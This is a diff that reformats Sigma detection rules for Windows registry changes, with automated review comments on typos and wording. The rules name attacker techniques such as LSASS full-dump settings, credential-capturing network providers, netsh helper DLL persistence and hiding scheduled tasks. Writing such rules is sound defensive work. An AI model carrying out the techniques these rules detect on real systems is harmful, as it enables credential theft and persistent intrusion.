- https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
diff --git a/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml b/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml
index ba09b241b..276e0fecf 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml
@@ -24,7 +24,7 @@ detection:
- \Software\Microsoft\Fax\Device Providers\
- \ImageName
filter:
- Details: '%systemroot%\system32\fxst30.dll'
+ Details: '%systemroot%\system32\fxst30.dll' # Windows 10
condition: registry_set and (selection and not filter)
falsepositives:
- Unknown
diff --git a/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml b/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml
index cb82d42dd..5c1a09703 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_file_association_exefile.yml
@@ -1,8 +1,7 @@
title: New File Association Using Exefile
id: 44a22d59-b175-4f13-8c16-cbaef5b581ff
status: test
-description: Detects the abuse of the exefile handler in new file association. Used
- for bypass of security products.
+description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
references:
- https://twitter.com/mrd0x/status/1461041276514623491
author: Andreas Hunkeler (@Karneades)
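Review bot: In the fax_dll_persistance hunk the new `# Windows 10` comment documents that the single `filter` value was validated on one OS version only, while the rule's `falsepositives` entry below it still reads `- Unknown`; an exact `Details` match on one default path means any other version or locale that ships a different default will alert, and the person triaging has nowhere to learn that. Suggest recording it where tuning happens, e.g. `- Default ImageName values on Windows versions other than Windows 10 are not filtered; extend the filter per OS`. Whether other versions actually use a different default is not shown here, so the wording should stay a caveat rather than a claim.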
diff --git a/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml
index c544bae74..3695e7e54 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml
@@ -1,8 +1,7 @@
title: Add Debugger Entry To Hangs Key For Persistence
id: 833ef470-fa01-4631-a79b-6f291c9ac498
status: experimental
-description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key
- in order to achieve persistence which will get invoked when an application crashes
+description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
references:
- https://persistence-info.github.io/Data/wer_debugger.html
- https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
diff --git a/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml
index 3e16fb84e..ef8049e58 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml
@@ -1,8 +1,7 @@
title: Persistence Via Hhctrl.ocx
id: f10ed525-97fe-4fed-be7c-2feecca941b1
status: experimental
-description: Detects when an attacker modifies the registry value of the "hhctrl"
- to point to a custom binary
+description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
references:
- https://persistence-info.github.io/Data/hhctrl.html
- https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/
diff --git a/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml b/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml
index 55f5aa588..b79a1d7ea 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_hide_file.yml
@@ -1,8 +1,7 @@
title: Modification of Explorer Hidden Keys
id: 5a5152f1-463f-436b-b2f5-8eceb3964b42
status: experimental
-description: Detects modifications to the hidden files keys in registry. This technique
- is abused by several malware families to hide their files from normal users.
+description: Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry
author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml b/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml
index cf1907b80..b8e8f52b9 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_hide_function_user.yml
@@ -1,8 +1,7 @@
title: Registry Hide Function from User
id: 5a93eb65-dffa-4543-b761-94aa60098fb6
status: test
-description: Detects registry modifications that hide internal tools or functions
- from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
+description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
index c75084ea5..e41bea0e8 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml
@@ -1,18 +1,14 @@
title: Hide Schedule Task Via Index Value Tamper
id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61
related:
- - id: acd74772-5f88-45c7-956b-6a7b36c294d2
- type: similar
- - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
- type: similar
+ - id: acd74772-5f88-45c7-956b-6a7b36c294d2
+ type: similar
+ - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
+ type: similar
status: experimental
-description: 'Detects when the "index" value of a scheduled task is modified from
- the registry
-
- Which effectively hides it from any tooling such as "schtasks /query" (Read the
- referenced link for more information about the effects of this technique)
-
- '
+description: |
+ Detects when the "index" value of a scheduled task is modified from the registry
+ Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
references:
- https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml
index 62ed8bead..564e2f1d7 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml
@@ -1,15 +1,11 @@
title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724
related:
- - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0
- type: similar
+ - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0
+ type: similar
status: experimental
-description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties)
- ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My
- Computer" zone. This allows downloaded files from the Internet to be granted the
- same level of trust as files stored locally.
-
- '
+description: |
+ Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
references:
- https://twitter.com/M_haggis/status/1699056847154725107
- https://twitter.com/JAMESWT_MHT/status/1699042827261391247
diff --git a/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml b/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml
index 4359585cc..523a27bd3 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml
@@ -1,21 +1,13 @@
title: Uncommon Extension In Keyboard Layout IME File Registry Value
id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1
related:
- - id: 9d8f9bb8-01af-4e15-a3a2-349071530530
- type: derived
+ - id: 9d8f9bb8-01af-4e15-a3a2-349071530530
+ type: derived
status: experimental
-description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature,
- which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST
- message.
-
- Before doing this, the client needs to register the DLL in a special registry
- key that is assumed to implement this keyboard layout. This registry key should
- store a value named "Ime File" with a DLL path.
-
- IMEs are essential for languages that have more characters than can be represented
- on a standard keyboard, such as Chinese, Japanese, and Korean.
-
- '
+description: |
+ Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+ Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+ IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
references:
- https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
author: X__Junior (Nextron Systems)
@@ -39,7 +31,6 @@ detection:
Details|endswith: .ime
condition: registry_set and (selection and not 1 of filter_main_*)
falsepositives:
- - IMEs are essential for languages that have more characters than can be represented
- on a standard keyboard, such as Chinese, Japanese, and Korean.
+ - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
level: high
ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml b/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml
index b6e071c3e..3e4eef3f6 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml
@@ -1,21 +1,13 @@
title: Suspicious Path In Keyboard Layout IME File Registry Value
id: 9d8f9bb8-01af-4e15-a3a2-349071530530
related:
- - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1
- type: derived
+ - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1
+ type: derived
status: experimental
-description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature,
- which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST
- message.
-
- Before doing this, the client needs to register the DLL in a special registry
- key that is assumed to implement this keyboard layout. This registry key should
- store a value named "Ime File" with a DLL path.
-
- IMEs are essential for languages that have more characters than can be represented
- on a standard keyboard, such as Chinese, Japanese, and Korean.
-
- '
+description: |
+ Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+ Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+ IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
references:
- https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/
author: X__Junior (Nextron Systems)
@@ -44,15 +36,15 @@ detection:
- \AppData\Roaming\
- \Temporary Internet
selection_folders_2:
- - Details|contains|all:
- - :\Users\
- - \Favorites\
- - Details|contains|all:
- - :\Users\
- - \Favourites\
- - Details|contains|all:
- - :\Users\
- - \Contacts\
+ - Details|contains|all:
+ - :\Users\
+ - \Favorites\
+ - Details|contains|all:
+ - :\Users\
+ - \Favourites\
+ - Details|contains|all:
+ - :\Users\
+ - \Contacts\
condition: registry_set and (selection_registry and 1 of selection_folders_*)
falsepositives:
- Unknown
diff --git a/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml b/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
index 801e0c4e0..cd40b7b8d 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml
@@ -1,8 +1,7 @@
title: New Root or CA or AuthRoot Certificate to Store
id: d223b46b-5621-4037-88fe-fda32eead684
status: experimental
-description: Detects the addition of new root, CA or AuthRoot certificates to the
- Windows registry
+description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store
- https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
diff --git a/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml b/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml
index 03a06c3aa..c4bf85d27 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml
@@ -1,11 +1,8 @@
title: Internet Explorer DisableFirstRunCustomize Enabled
id: ab567429-1dfb-4674-b6d2-979fd2f9d125
status: experimental
-description: 'Detects changes to the Internet Explorer "DisableFirstRunCustomize"
- value, which prevents Internet Explorer from running the first run wizard the
- first time a user starts the browser after installing Internet Explorer or Windows.
-
- '
+description: |
+ Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
- https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
@@ -26,15 +23,14 @@ detection:
selection:
TargetObject|endswith: \Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
Details:
- - DWORD (0x00000001)
- - DWORD (0x00000002)
+ - DWORD (0x00000001) # Home Page
+ - DWORD (0x00000002) # Welcome To IE
filter_main_generic:
Image:
- C:\Windows\explorer.exe
- C:\Windows\System32\ie4uinit.exe
condition: registry_set and (selection and not 1 of filter_main_*)
falsepositives:
- - As this is controlled by group policy as well as user settings. Some false positives
- may occur.
+ - As this is controlled by group policy as well as user settings. Some false positives may occur.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml b/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml
index 312e23976..5a94b5513 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml
@@ -1,9 +1,7 @@
title: Potential Ransomware Activity Using LegalNotice Message
id: 8b9606c9-28be-4a38-b146-0e313cc232c1
status: experimental
-description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry
- values where the message set contains keywords often used in ransomware ransom
- messages
+description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
references:
- https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md
author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml b/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml
index 8cedb9c36..c45a93ad5 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml
@@ -1,13 +1,9 @@
title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
status: experimental
-description: 'Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download
- a file from the Internet without executing any
-
- anomalous executables with suspicious arguments. The downloaded file will be in
- C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
-
- '
+description: |
+ Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
+ anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
references:
- https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
author: frack113
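Review bot: In the OneDriveStandaloneUpdater hunk the rewritten description carries over the path `...\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json`, which reads as if a directory separator and a leading character were lost between `StandaloneUpdater` and the file name; an analyst pivoting from the alert to disk will search for a file that does not exist under that name. The LOLBAS page in `references` is the place to confirm the exact drop path, and the description should be corrected to match it rather than preserved verbatim from the old folded string. Since this block-scalar rewrite is the moment the text was touched, it is the cheapest time to fix it.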
diff --git a/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml b/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml
index 4b754b53b..79edd5823 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml
@@ -1,19 +1,13 @@
title: RestrictedAdminMode Registry Value Tampering
id: d6ce7ebd-260b-4323-9768-a9631c8d4db2
related:
- - id: 28ac00d6-22d9-4a3c-927f-bbd770104573
- type: similar
+ - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 # process_creation
+ type: similar
status: experimental
-description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order
- to disable or enable RestrictedAdmin mode.
-
- RestrictedAdmin mode prevents the transmission of reusable credentials to the
- remote system to which you connect using Remote Desktop.
-
- This prevents your credentials from being harvested during the initial connection
- process if the remote server has been compromise
-
- '
+description: |
+ Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
+ RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
+ This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
references:
- https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md
- https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx
diff --git a/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml b/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml
index c25aaa697..2cec99ed7 100644
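Review bot: The last line of the rewritten description still ends mid-word, `if the remote server has been compromise`, and the block-scalar rewrite was the natural point to finish the sentence: `This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.`. The description is what shows up in the alert, so a truncated sentence there reads as if the rule itself is unfinished. The rest of the hunk only reflows text and adds the `# process_creation` annotation on the related rule, which is fine.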
--- a/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml
@@ -1,9 +1,7 @@
title: Lsass Full Dump Request Via DumpType Registry Settings
id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
status: experimental
-description: Detects the setting of the "DumpType" registry value to "2" which stands
- for a "Full Dump". Technique such as LSASS Shtinkering requires this value to
- be "2" in order to dump LSASS.
+description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
references:
- https://github.com/deepinstinct/Lsass-Shtinkering
- https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
@@ -26,7 +24,7 @@ detection:
TargetObject|contains:
- \SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType
- \SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe\DumpType
- Details: DWORD (0x00000002)
+ Details: DWORD (0x00000002) # Full Dump
condition: registry_set and selection
falsepositives:
- Legitimate application that needs to do a full dump of their process
diff --git a/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml b/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml
index 7038c0bfd..69c4077f4 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_mal_adwind.yml
@@ -1,8 +1,8 @@
title: Adwind RAT / JRAT - Registry
id: 42f0e038-767e-4b85-9d96-2c6335bad0b5
related:
- - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
- type: derived
+ - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
+ type: derived
status: experimental
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml b/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml
index d5fa8fcc0..66958202f 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml
@@ -1,8 +1,8 @@
title: Blue Mockingbird - Registry
id: 92b0b372-a939-44ed-a11b-5136cf680e27
related:
- - id: c3198a27-23a0-4c2c-af19-e5328d49680e
- type: derived
+ - id: c3198a27-23a0-4c2c-af19-e5328d49680e
+ type: derived
status: experimental
description: Attempts to detect system changes made by Blue Mockingbird
references:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml b/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml
index cd22852a9..dc08ae21d 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml
@@ -1,17 +1,10 @@
title: NET NGenAssemblyUsageLog Registry Key Tamper
id: 28036918-04d3-423d-91c0-55ecf99fb892
status: experimental
-description: 'Detects changes to the NGenAssemblyUsageLog registry key.
-
- .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog
- CLR configuration knob in the Registry or by configuring an environment variable
- (as described in the next section).
-
- By simplify specifying an arbitrary value (e.g. fake output location or junk data)
- for the expected value, a Usage Log file for the .NET execution context will not
- be created.
-
- '
+description: |
+ Detects changes to the NGenAssemblyUsageLog registry key.
+ .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
+ By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
references:
- https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/
author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml b/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml
index 12d00f041..7bdb57f34 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml
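Review bot: The rewritten description keeps two wording defects that the block-scalar rewrite should have cleaned up: `(as described in the next section)` refers to a section of the source blog post, not to anything in this rule, and `By simplify specifying` should read `By simply specifying`. Suggest `... or by configuring an environment variable (see the referenced post).` for the second line and `By simply specifying an arbitrary value ...` for the third. Since the environment-variable path is out of scope for a registry_set rule, saying so in that parenthetical also tells the reader why this rule alone does not cover it.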
@@ -1,16 +1,13 @@
title: New Netsh Helper DLL Registered From A Suspicious Location
id: e7b18879-676e-4a0e-ae18-27039185a8e7
related:
- - id: 56321594-9087-49d9-bf10-524fe8479452
- type: similar
- - id: c90362e0-2df3-4e61-94fe-b37615814cb1
- type: similar
+ - id: 56321594-9087-49d9-bf10-524fe8479452
+ type: similar
+ - id: c90362e0-2df3-4e61-94fe-b37615814cb1
+ type: similar
status: experimental
-description: 'Detects changes to the Netsh registry key to add a new DLL value that
- is located on a suspicious location. This change might be an indication of a potential
- persistence attempt by adding a malicious Netsh helper
-
- '
+description: |
+ Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
references:
- https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
- https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
@@ -37,18 +34,18 @@ detection:
- \AppData\Local\Temp\
- \Temporary Internet
selection_folders_2:
- - Details|contains|all:
- - :\Users\
- - \Favorites\
- - Details|contains|all:
- - :\Users\
- - \Favourites\
- - Details|contains|all:
- - :\Users\
- - \Contacts\
- - Details|contains|all:
- - :\Users\
- - \Pictures\
+ - Details|contains|all:
+ - :\Users\
+ - \Favorites\
+ - Details|contains|all:
+ - :\Users\
+ - \Favourites\
+ - Details|contains|all:
+ - :\Users\
+ - \Contacts\
+ - Details|contains|all:
+ - :\Users\
+ - \Pictures\
condition: registry_set and (selection_target and 1 of selection_folders_*)
falsepositives:
- Unknown
diff --git a/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml
index 17ea1511c..f6abdce90 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml
@@ -1,16 +1,13 @@
title: Potential Persistence Via Netsh Helper DLL - Registry
id: c90362e0-2df3-4e61-94fe-b37615814cb1
related:
- - id: 56321594-9087-49d9-bf10-524fe8479452
- type: similar
- - id: e7b18879-676e-4a0e-ae18-27039185a8e7
- type: similar
+ - id: 56321594-9087-49d9-bf10-524fe8479452
+ type: similar
+ - id: e7b18879-676e-4a0e-ae18-27039185a8e7
+ type: similar
status: experimental
-description: 'Detects changes to the Netsh registry key to add a new DLL value. This
- change might be an indication of a potential persistence attempt by adding a malicious
- Netsh helper
-
- '
+description: |
+ Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
references:
- https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
- https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
diff --git a/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml b/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml
index 50b30adde..93b290fb1 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml
@@ -1,8 +1,7 @@
title: New Application in AppCompat
id: 60936b49-fca0-4f32-993d-7415edcf9a5d
status: test
-description: A General detection for a new application in AppCompat. This indicates
- an application executing for the first time on an endpoint.
+description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/1
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md
@@ -24,8 +23,7 @@ detection:
TargetObject|contains: \AppCompatFlags\Compatibility Assistant\Store\
condition: registry_set and selection
falsepositives:
- - This rule is to explore new applications on an endpoint. False positives depends
- on the organization.
+ - This rule is to explore new applications on an endpoint. False positives depends on the organization.
- Newly setup system.
- Legitimate installation of new application.
level: informational
diff --git a/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml b/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml
index 5955c505d..94f257463 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_new_network_provider.yml
@@ -1,11 +1,10 @@
title: Potential Credential Dumping Attempt Using New NetworkProvider - REG
id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701
related:
- - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77
- type: similar
+ - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77
+ type: similar
status: experimental
-description: Detects when an attacker tries to add a new network provider in order
- to dump clear text credentials, similar to how the NPPSpy tool does it
+description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
references:
- https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade
- https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
@@ -32,6 +31,7 @@ detection:
- \System\CurrentControlSet\Services\WebClient\NetworkProvider
- \System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider
- \System\CurrentControlSet\Services\RDPNP\NetworkProvider
+ # - '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV
filter_valid_procs:
Image: C:\Windows\System32\poqexec.exe
condition: registry_set and (selection and not 1 of filter*)
diff --git a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml
index df4395201..fdfa231d6 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml
